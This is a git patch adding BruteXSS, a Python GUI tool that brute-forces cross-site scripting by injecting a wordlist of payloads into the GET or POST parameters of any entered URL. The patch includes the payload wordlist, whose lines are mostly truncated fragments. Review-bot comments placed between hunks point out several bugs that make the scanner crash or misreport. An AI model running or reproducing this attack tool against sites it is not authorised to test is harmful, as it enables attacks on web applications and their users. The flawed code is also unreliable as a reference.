From b57cbb0affce7007e015c5ce48248c6a830e1079 Mon Sep 17 00:00:00 2001
From: Rajesh Majumdar
Date: Mon, 27 Feb 2017 01:13:58 +0530
Subject: [PATCH] Added some required files.
---
brutexss.py | 460 +++++++++++++++++++++++++++++++++++++++++++++
checkurl.py | 25 +++
checkurl.pyc | Bin 0 -> 893 bytes
icon.ico | Bin 0 -> 1150 bytes
parameters.py | 21 +++
parameters.pyc | Bin 0 -> 713 bytes
wordlist.txt | 25 +++
wordlistimport.py | 10 +
wordlistimport.pyc | Bin 0 -> 492 bytes
9 files changed, 541 insertions(+)
create mode 100644 brutexss.py
create mode 100644 checkurl.py
create mode 100644 checkurl.pyc
create mode 100644 icon.ico
create mode 100644 parameters.py
create mode 100644 parameters.pyc
create mode 100644 wordlist.txt
create mode 100644 wordlistimport.py
create mode 100644 wordlistimport.pyc
diff --git a/brutexss.py b/brutexss.py
new file mode 100644
index 0000000..e5cf19f
--- /dev/null
+++ b/brutexss.py
@@ -0,0 +1,460 @@ +#! /usr/bin/env python + +__author__ = 'Rajesh Majumdar' + +try: + from tkinter import * + import tkinter.scrolledtext as sctx +except: + from Tkinter import * + import ScrolledText as sctx + + +try: + import ttk +except ImportError: + from tkinter.ttk import ttk + +import sys +import os +import urlparse +from string import whitespace +import urllib +import httplib +import thread +import time +import tkMessageBox +import threading +from time import gmtime, strftime + +from wordlistimport import importword +from checkurl import checkurl +from parameters import checkparams, getquery +import mechanize + +top = Tk() + +_bgcolor = '#d9d9d9' # X11 color: 'gray85' +_fgcolor = '#000000' # X11 color: 'black' +_compcolor = '#d9d9d9' # X11 color: 'gray85' +_ana1color = '#d9d9d9' # X11 color: 'gray85' +_ana2color = '#d9d9d9' # X11 color: 'gray85' +style = ttk.Style() +if sys.platform == "win32": + style.theme_use('winnative') +style.configure('.',background=_bgcolor) +style.configure('.',foreground=_fgcolor) +style.configure('.',font="TkDefaultFont") +style.map('.',background= + [('selected', _compcolor), ('active',_ana2color)]) + +top.geometry("598x537+442+151") +top.title("BruteXSS - XSS Bruteforcing Tool") +top.configure(background="#d9d9d9") +top.configure(highlightbackground="#d9d9d9") +top.configure(highlightcolor="black") +if os.name == "nt": + top.iconbitmap('icon.ico') +else: + pass + + +def getmethod(vlink): + #print "Program reached here" + path = "wordlist.txt" + site = vlink + if 'https://' in vlink: + pass + elif 'http://' in vlink: + pass + else: + #print "Program is there" + site = 'http://'+vlink + finalurl= urlparse.urlparse(site) + urldata = urlparse.parse_qsl(finalurl.query) + domain0 = '{uri.scheme}://{uri.netloc}/'.format(uri=finalurl) + domain = domain0.replace("https://","").replace("http://","").replace("www.","").replace("/","") + #print (Style.DIM+Fore.WHITE+"[+] Checking if "+domain+" is available..."+Style.RESET_ALL) + 
#connection = httplib.HTTPConnection(domain) + #connection.connect() + #print("[+] "+Fore.GREEN+domain+" is available! Good!"+Style.RESET_ALL) + url = site + paraname = [] + paravalue = [] + payloads = [] + importword(path,payloads) + #print payloads + lop = str(len(payloads)) + output.insert(END, "\n[+] "+lop+" payloads loaded.") + output.insert(END, "\n[+] Bruteforce start:") + o = urlparse.urlparse(site) + parameters = urlparse.parse_qs(o.query,keep_blank_values=True) + path = urlparse.urlparse(site).scheme+"://"+urlparse.urlparse(site).netloc+urlparse.urlparse(site).path + for para in parameters: + for i in parameters[para]: + paraname.append(para) + paravalue.append(i) + total = 0 + c = 0 + fpar = [] + fresult = [] + prgs = 0 + for pn, pv in zip(paraname,paravalue): #Scanning the parameter. + output.insert(END, "\n[+] Testing '"+pn+"' parameter...") + fpar.append(str(pn)) + for x in payloads: # + validate = x.translate(None, whitespace) + if validate == "": + + prgs = prgs + 1 + else: + output.insert(END, "\n[+] %i / %s payloads injected..."% (prgs,len(payloads))) + prgs = prgs + 1 + enc = urllib.quote_plus(x) + data = path+"?"+pn+"="+pv+enc + page = urllib.urlopen(data) + sourcecode = page.read() + if x in sourcecode: + output.insert(END, "\n[!]"+" XSS Vulnerability Found! \n[!]"+" Parameter:\t"+pn+"\n[!] 
Payload:\t"+x) + fresult.append(" Vulnerable ") + c = 1 + total = total+1 + prgs = prgs + 1 + break + else: + c = 0 + if c == 0: + output.insert(END, "\n[+] '%s' parameter not vulnerable.")%pn + fresult.append("Not Vulnerable") + prgs = prgs + 1 + pass + prgs = 0 + complete(fpar,fresult,total,domain) +def complete(p, r, c, d): + output.insert(END, "\n[+] Bruteforcing Completed.") + progress.stop() + if c == 0: + output.insert(END, "\n[+] Given parameters are not vulnerable.") + elif c == 1: + output.insert(END, "\n[+] %s Parameter is vulnerable to XSS."%c) + else: + output.insert(END, "\n[+] %s Parameters are vulnerable to XSS."%c) + +def postmethod(vlink): + br = mechanize.Browser() + br.addheaders = [('User-agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11)Gecko/20071127 Firefox/2.0.0.11')] + br.set_handle_robots(False) + br.set_handle_refresh(False) + site = vlink + if 'https://' in site: + pass + elif 'http://' in site: + pass + else: + site = 'http://'+site + finalurl = urlparse.urlparse(site) + urldata = urlparse.parse_qsl(finalurl.query) + domain0 = '{uri.scheme}://{uri.netloc}/'.format(uri=finalurl) + domain = domain0.replace("https://","").replace("http://","").replace("www.","").replace("/","") + path = urlparse.urlparse(site).scheme+"://"+urlparse.urlparse(site).netloc+urlparse.urlparse(site).path + url = site + with open ('postdata.txt', 'r') as f: + param = f.read() + wrdlist = wordlist.get() + payloads = [] + payloads = [] + importword(wrdlist,payloads) + lop = str(len(payloads)) + output.insert(END, "[+] "+lop+" Payloads loaded...") + output.insert(END, "[+] Bruteforce start:") + params = "http://www.site.com/?"+param + finalurl = urlparse.urlparse(params) + urldata = urlparse.parse_qsl(finalurl.query) + o = urlparse.urlparse(params) + parameters = urlparse.parse_qs(o.query,keep_blank_values=True) + paraname = [] + paravalue = [] + for para in parameters: #Arranging parameters and values. 
+ for i in parameters[para]: + paraname.append(para) + paravalue.append(i) + fpar = [] + fresult = [] + total = 0 + prgs = 0 + pname1 = [] #parameter name + payload1 = [] + for pn, pv in zip(paraname,paravalue): #Scanning the parameter. + output.insert(END, "[+] Testing '"+pn+"' parameter...") + fpar.append(str(pn)) + for i in payloads: + validate = i.translate(None, whitespace) + if validate == "": + progress = progress + 1 + else: + progress = progress + 1 + output.insert(END, "\n[+] %i / %s payloads injected..."% (prgs,len(payloads))) + pname1.append(pn) + payload1.append(str(i)) + freakym0nk = 0 + for m in range(len(paraname)): + d = paraname[freakym0nk] + d1 = paravalue[freakym0nk] + tst= "".join(pname1) + tst1 = "".join(d) + if pn in d: + freakym0nk = freakym0nk + 1 + else: + freakym0nk = freakym0nk +1 + pname1.append(str(d)) + payload1.append(str(d1)) + data = urllib.urlencode(dict(zip(pname1,payload1))) + r = br.open(path, data) + sourcecode = r.read() + pname1 = [] + payload1 = [] + if i in sourcecode: + output.insert(END, "\n[!] "+" XSS Vulnerability Found! \n[!] "+" Parameter:\t%s\n[!] "+" Payload:\t%s")%(pn,i) + fresult.append(" Vulnerable ") + c = 1 + total = total+1 + prgs = prgs + 1 + break + else: + c = 0 + if c == 0: + output.insert(END, "\n[+]"+" '%s' parameter not vulnerable.")%pn + fresult.append("Not Vulnerable") + prgs = prgs + 1 + pass + prgs = 0 + complete(fpar,fresult,total,domain) +def execute(): + time = strftime("%Y-%m-%d %H:%M:%S", gmtime()) + output.insert(END, "\nBruteXSS started on "+time) + status = "0" + link = url.get() #Working for URL + postchecked = postmethodchecked.get() + getchecked = getmethodchecked.get() + #print link #For Testing + domainame = urlparse.urlparse(link) + domainname = domainame.hostname + + #Checking for URL + isavailable = checkurl(link, status) + if isavailable == "1": + output.insert(END, "\n\n[+] Site '"+domainname+"' is available, Good!") + else: + output.insert(END, "\n[!] Oops! 
URL not available") + + #Checking for params + param = checkparams(link) + #print param #For testing + if param == "1": + print("\nParam is there.") + elif param == "0": + output.insert(END, "\n[!] Oops! can't find any parameters!") + output.insert(END, "\nPlease try again.") + top.mainloop() + #else: + #output.insert(END, "\n Something went wrong.") + + #POST Data + datafile = open("postdata.txt","w") + content = postdata.get("1.0", "end-1c") + datafile.write(content) + datafile.close() + + + #Working for path + #print path #For testing + #importword(path, payloads) + #lop = str(len(payloads)) + #output.insert(END, "\n[+] Loading payloads....") + #output.insert(END, "\n[+] Loaded "+lop+" payloads.") + #progress.start(1) + + + #The bruteforce part + if postchecked == 1: + postmethod(link) + elif getchecked == 1: + getmethod(link) + else: + output.insert(END, "\n[+] Something went wrong!") + top.mainloop() + +def process(): + progress.start(1) + bckprocess = threading.Thread(target=execute) + bckprocess.start() + +#URL Field +url = Entry(top) +url.place(relx=0.22, rely=0.04, relheight=0.04, relwidth=0.49) +url.configure(background="white") +url.configure(disabledforeground="#a3a3a3") +url.configure(font="TkFixedFont") +url.configure(foreground="#000000") +url.configure(highlightbackground="#d9d9d9") +url.configure(highlightcolor="black") +url.configure(insertbackground="black") +url.configure(selectbackground="#c4c4c4") +url.configure(selectforeground="black") +url.insert(END, "https://") + +#BruteXSS Button +brutexss = Button(top, command=process) #Remove "" +brutexss.place(relx=0.75, rely=0.04, height=25, width=76) +brutexss.configure(activebackground="#d9d9d9") +brutexss.configure(activeforeground="#000000") +brutexss.configure(background="#d9d9d9") +brutexss.configure(disabledforeground="#a3a3a3") +brutexss.configure(foreground="#000000") +brutexss.configure(highlightbackground="#d9d9d9") +brutexss.configure(highlightcolor="black") +brutexss.configure(pady="0") 
+brutexss.configure(text='''BruteXSS''')
+
+#Label 1
+TLabel1 = ttk.Label(top)
+TLabel1.place(relx=0.1, rely=0.04, height=19, width=66)
+TLabel1.configure(background="#d9d9d9")
+TLabel1.configure(foreground="#000000")
+TLabel1.configure(relief=FLAT)
+TLabel1.configure(text='''Enter URL''')
+
+#Progress Bar
+progress = ttk.Progressbar(top, orient = HORIZONTAL, length=395, mode="indeterminate")
+progress.place(relx=0.07, rely=0.17, relwidth=0.85
+ , relheight=0.0, height=22)
+
+#Label 2
+TLabel2 = ttk.Label(top)
+TLabel2.place(relx=0.18, rely=0.95, height=19, width=154)
+TLabel2.configure(background="#d9d9d9")
+TLabel2.configure(foreground="#000000")
+TLabel2.configure(relief=FLAT)
+TLabel2.configure(text='''CLI Developer : Shawar Khan''')
+
+#Label 3
+TLabel3 = ttk.Label(top)
+TLabel3.place(relx=0.48, rely=0.95, height=19, width=180)
+TLabel3.configure(background="#d9d9d9")
+TLabel3.configure(foreground="#000000")
+TLabel3.configure(relief=FLAT)
+TLabel3.configure(text='''GUI Developer : Rajesh Majumdar''')
+
+#MenuBar
+menubar = Menu(top,bg=_bgcolor,fg=_fgcolor)
+top.configure(menu = menubar)
+
+#Label 4
+TLabel4 = ttk.Label(top)
+TLabel4.place(relx=0.07, rely=0.3, height=19, width=90)
+TLabel4.configure(background="#d9d9d9")
+TLabel4.configure(foreground="#000000")
+TLabel4.configure(relief=FLAT)
+TLabel4.configure(text='''Enter POST Data''')
+
+#Label 5
+TLabel5 = ttk.Label(top)
+TLabel5.place(relx=0.07, rely=0.54, height=19, width=42)
+TLabel5.configure(background="#d9d9d9")
+TLabel5.configure(foreground="#000000")
+TLabel5.configure(relief=FLAT)
+TLabel5.configure(text='''Output''')
+
+#Label 6
+TLabel6 = ttk.Label(top)
+TLabel6.place(relx=0.07, rely=0.24, height=19, width=91)
+TLabel6.configure(background="#d9d9d9")
+TLabel6.configure(foreground="#000000")
+TLabel6.configure(relief=FLAT)
+TLabel6.configure(text='''Custom wordlist''')
+
+#Wordlist Path
+wordlist = Entry(top) #WORDLIST HERE
+wordlist.place(relx=0.25, rely=0.24, relheight=0.04, relwidth=0.65)
+wordlist.configure(background="white")
+wordlist.configure(disabledforeground="#a3a3a3")
+wordlist.configure(font="TkFixedFont")
+wordlist.configure(foreground="#000000")
+wordlist.configure(highlightbackground="#d9d9d9")
+wordlist.configure(highlightcolor="black")
+wordlist.configure(insertbackground="black")
+wordlist.configure(selectbackground="#c4c4c4")
+wordlist.configure(selectforeground="black")
+wordlist.insert(END, "wordlist.txt")
+
+#POST Data Box
+postdata = sctx.ScrolledText(top)
+postdata.place(relx=0.07, rely=0.34, relheight=0.21
+ , relwidth=0.84)
+postdata.configure(background="white")
+postdata.configure(font="TkTextFont")
+postdata.configure(foreground="black")
+postdata.configure(highlightbackground="#d9d9d9")
+postdata.configure(highlightcolor="black")
+postdata.configure(insertbackground="black")
+postdata.configure(insertborderwidth="3")
+postdata.configure(selectbackground="#c4c4c4")
+postdata.configure(selectforeground="black")
+postdata.configure(width=10)
+postdata.configure(wrap=NONE)
+
+#Output Box
+output = sctx.ScrolledText(top)
+output.place(relx=0.07, rely=0.58, relheight=0.36
+ , relwidth=0.84)
+output.configure(background="white")
+output.configure(font="TkTextFont")
+output.configure(foreground="black")
+output.configure(highlightbackground="#d9d9d9")
+output.configure(highlightcolor="black")
+output.configure(insertbackground="black")
+output.configure(insertborderwidth="3")
+output.configure(selectbackground="#c4c4c4")
+output.configure(selectforeground="black")
+output.configure(width=10)
+output.configure(wrap=NONE)
+output.see(END)
+
+#GET Method Checkbox
+getmethodchecked = IntVar()
+getmethodchecked.set(1)
+getmethodcheck = Checkbutton(top, variable=getmethodchecked)
+getmethodcheck.place(relx=0.25, rely=0.11, relwidth=0.15
+ , relheight=0.0, height=21)
+getmethodcheck.configure(activebackground="#d9d9d9")
+getmethodcheck.configure(activeforeground="#000000")
+getmethodcheck.configure(background="#d9d9d9")
+getmethodcheck.configure(disabledforeground="#a3a3a3")
+getmethodcheck.configure(foreground="#000000")
+getmethodcheck.configure(highlightbackground="#d9d9d9")
+getmethodcheck.configure(highlightcolor="black")
+getmethodcheck.configure(justify=LEFT)
+getmethodcheck.configure(text='''GET Method''')
+
+#POST Method Check
+postmethodchecked = IntVar()
+postmethodcheck = Checkbutton(top, variable=postmethodchecked)
+postmethodcheck.place(relx=0.52, rely=0.11, relwidth=0.16
+ , relheight=0.0, height=21)
+postmethodcheck.configure(activebackground="#d9d9d9")
+postmethodcheck.configure(activeforeground="#000000")
+postmethodcheck.configure(background="#d9d9d9")
+postmethodcheck.configure(disabledforeground="#a3a3a3")
+postmethodcheck.configure(foreground="#000000")
+postmethodcheck.configure(highlightbackground="#d9d9d9")
+postmethodcheck.configure(highlightcolor="black")
+postmethodcheck.configure(justify=LEFT)
+postmethodcheck.configure(text='''POST Method''')
+
+def start():
+ start = Tk()
+ start.geometry("1x1+"+str(start.winfo_screenwidth()/2)+"+"+str(start.winfo_screenheight()/2))
+ tkMessageBox.showinfo(title="Disclaimer", message="This tool is a free software.\nIt means you are not allowed to modify the source code, or any files of this tool, or not allowed to sell its copy.\nYou can use this tool in your tool but you are not allowed to modify anything.")
+ top.mainloop()
+
+start()
diff --git a/checkurl.py b/checkurl.py
new file mode 100644
index 0000000..666c632
--- /dev/null
+++ b/checkurl.py
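Review bot: In getmethod the not-vulnerable message applies `%` to the return value of the call rather than to the string (`output.insert(END, "\n[+] '%s' parameter not vulnerable.")%pn`), so the worker thread most likely dies with a TypeError on the first parameter that reflects no payload and `complete()` never runs; it should read `output.insert(END, "\n[+] '%s' parameter not vulnerable." % pn)`. postmethod has the same misplaced `%` on both of its result messages, and its `progress = progress + 1` makes the global progress bar a local name (presumably `prgs` was meant), which raises UnboundLocalError before any request is sent. getmethod also hard-codes `path = "wordlist.txt"` while postmethod reads `wordlist.get()`, so the custom wordlist field is ignored for GET scans. Because `execute` runs in a background thread, these exceptions do not show up in the output box, and an aborted scan is easy to misread as a clean result.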
@@ -0,0 +1,25 @@
+#! /usr/bin/env python
+__author__ = 'Rajesh Majumdar'
+
+import httplib
+import socket
+import urlparse
+
+def checkurl(url, status):
+ if "http://" in url:
+ pass
+ elif "https://" in url:
+ pass
+ else:
+ url = "http://"+url
+ finalurl = urlparse.urlparse(url)
+ urldata = urlparse.parse_qsl(finalurl.query)
+ domain0 = '{uri.scheme}://{uri.netloc}/'.format(uri=finalurl)
+ domain = domain0.replace("https://","").replace("http://","").replace("www.","").replace("/","")
+ try:
+ request = httplib.HTTPConnection(domain)
+ request.connect()
+ status = "1"
+ except (httplib.HTTPResponse):
+ status = "0"
+ return status
diff --git a/checkurl.pyc b/checkurl.pyc
new file mode 100644
index 0000000000000000000000000000000000000000..3b8fa3d97d074bb6340beaa63e3e7e1337564244
GIT binary patch
literal 893 zcmb7C&59F25U!p{CfOkx5kwS`1ur=z>qTJ^5%=Q7Wl2^HArRV`UNV!(bhf*P5X_v` zC-Ot3vHzfTitz5x3>h=xg7!gq8aZO9qK{)9s1J<%#6 z)2H$Y*J;e>RK`v8aZTiia^l#HpgQm-P6m_*-s7p{&@Fb}kf;G#lzV1rn{JQ^j5hw@ z=pWo^aNVZe3vzABBibVqcL79{cTkf=+NE01=kh7FIHyain9L6nLZn9=DFsdU0+Wc* z*}3Irm(FcYMBGsvbiF1#R(7LHs|H-BVOse5)=5`c&*v&DWdTyY0`^oQ#s^ZpmRWh? z^AFg&jRH;U2FM_<>@m=%)A@zbImp=gds8_zolNE!S+YXO;b!Nry0du<{uGIx2w8$y z^u(PAMhx722_7_)h3LMJQb#+);L1ofBFfAV^>)@fC!xBT1t L=Z}IOSoMP6-)y-0 literal 0 HcmV?d00001
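Review bot: The `except (httplib.HTTPResponse):` clause in checkurl names the response class rather than an exception, so a failed `request.connect()` (which raises `socket.error`) is not caught and `status = "0"` is never returned; since `socket` is imported but unused, `except (socket.error, httplib.HTTPException):` was probably intended. The probe always uses `httplib.HTTPConnection`, so an https-only target is judged by a plain connect to port 80, and the `"http://" in url` tests accept the scheme anywhere in the string where `url.startswith(("http://", "https://"))` would be stricter. The commit also adds checkurl.pyc beside this source; compiled bytecode cannot be reviewed against the .py file and is better kept out of the repository via `.gitignore`.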
diff --git a/icon.ico b/icon.ico
new file mode 100644
index 0000000000000000000000000000000000000000..fcf897cb4d5b6722f7479e7e133fc54fd07ff691
GIT binary patch
literal 1150 zcmb7ESx-|@5WXh<0G@o)@E}A1HDJI6F}Of*BZMeQ1vJPaO9%o=qQM1)5LsPtsi??O zDJ}b=B1EJJBFLgpL?}@!OHl+V!~$(U=bqaV!<*C0IWylmGxMEu=9c4D(9gnxqtTK( zy^`ZraU8dflpsO`oFPclUTA^s|A`39b7^%3yM4+m!1sa_Z z<8up8Pt9UN2Wb8nnEqSR&$OC!iuY#px5(k z1ewv!F~6fzNoOu);54P?d7I;To5y%bzFh?6Cl#|778l_cdIgd3S@1X5P z;awk^dj|1+S_}2B87R6xqn@z0ANnAvdWC~W&m#K#4fs>+h*pQJM-|w0C=3NMIl6|& z(9$S@IQtp~#-{P{s|F9U6Y*9dLzik4Po7HQ;t_&71+}z3#dwH9uffLN9qqmS%pYpI zkD=abBxT&g^;-|2>XAd$na|dm+TX+4ZV!TEGMJxqQ-U4)B4O|7hKQ&$kXAlJDV;-{ zFNg2(6YvWNM2@74&Za<7MJ+h*3vmgzc!)_&-5ad6KLWe0A{+_4h?|cq@K|1tkk~YY$7dq9q=9ku z4!8hYCtp}O_@Jq!+Z@j3<3X2TvqgkW&H=EZT-LN_y`wMbu_fQZo+G#TX3K zyQbd%Lg(7D=M*+>_s7<~!DI(9b=n<-ZEhjVUTx!rh`7|Hx_s~RqBnh0AC*Jcxj&3? z;PcpR^JDqe+WTNT-EkD1<&~m?#hB|dhvg7@dT>}xJyL_pS_QmB@yNO>B`tzDx7@sy PI16=oVEO;S|N4Icl-4Wi literal 0 HcmV?d00001
diff --git a/parameters.py b/parameters.py
new file mode 100644
index 0000000..ed7fb2a
--- /dev/null
+++ b/parameters.py
@@ -0,0 +1,21 @@
+#! /usr/bin/env python
+__author__ = 'Rajesh Majumdar'
+
+from urlparse import urlparse
+
+def checkparams(url):
+ params = urlparse(url)
+ param = params.query
+ #print param #For testing
+ if "=" in param:
+ pstatus = "1"
+ else:
+ pstatus = "0"
+ return pstatus
+
+def getquery(url):
+ #This function would return the query
+ query = urlparse.query(url)
+ squery = query.split("=")
+ aquery = squery[1]
+ return aquery
\ No newline at end of file
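Review bot: getquery calls `urlparse.query(url)`, but the module binds `urlparse` to the function via `from urlparse import urlparse`, and that function has no `query` attribute, so every call raises AttributeError; `query = urlparse(url).query`, as checkparams already does, is the likely intent. `squery[1]` then raises IndexError for a query without `=` and otherwise returns only the text between the first and second `=`, so a URL with several parameters yields a value with the next parameter name glued on. Parsing the query with `parse_qsl`, which checkurl.py already uses, would avoid both problems. The file also ends without a trailing newline.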
diff --git a/parameters.pyc b/parameters.pyc new file mode 100644 index 0000000000000000000000000000000000000000..645cf8d797ed829abbe809dca917740d3ecf382e GIT binary patch literal 713 zcmb7>&q~8U5XNUWZM3zey?PT*K|~ZhiHhjiA}K;Cg%Fa({?b11YYJ^L;`g%9Kd z=r1J(C+b5L<(j67W{UcXR36X^7BuA* zNdn5N)Qv(u)q=$7*tp@|Z8|Pyd1^W^!0X>FCDLvN&OZVolkw?BBUhZ_L1G64esoGY%=c#*S7Gc*X<7EknzU4qs7wiU|Tjc z*`#bMo;0|NYN(p#2-Sab_8R1%{R1!L?1g52knjEwGe9S1;t@;4-$EL*7XsrJ(~%e4 znCZ&}nMaHe_O$c_%bQX1e|#`rPPdUeE|6}ima3~x>2V#EBuNWDoZBQRhpV9$HzB{q ZZsaasb3U8r#nfE#&vncb>b9=czW_EmhZ6t* literal 0 HcmV?d00001 diff --git a/wordlist.txt b/wordlist.txt new file mode 100644 index 0000000..af1d2d0 --- /dev/null +++ b/wordlist.txt @@ -0,0 +1,25 @@ +"> +"> +"> +"> +">

Clickme

+">Clickme +">Clickme +">click +">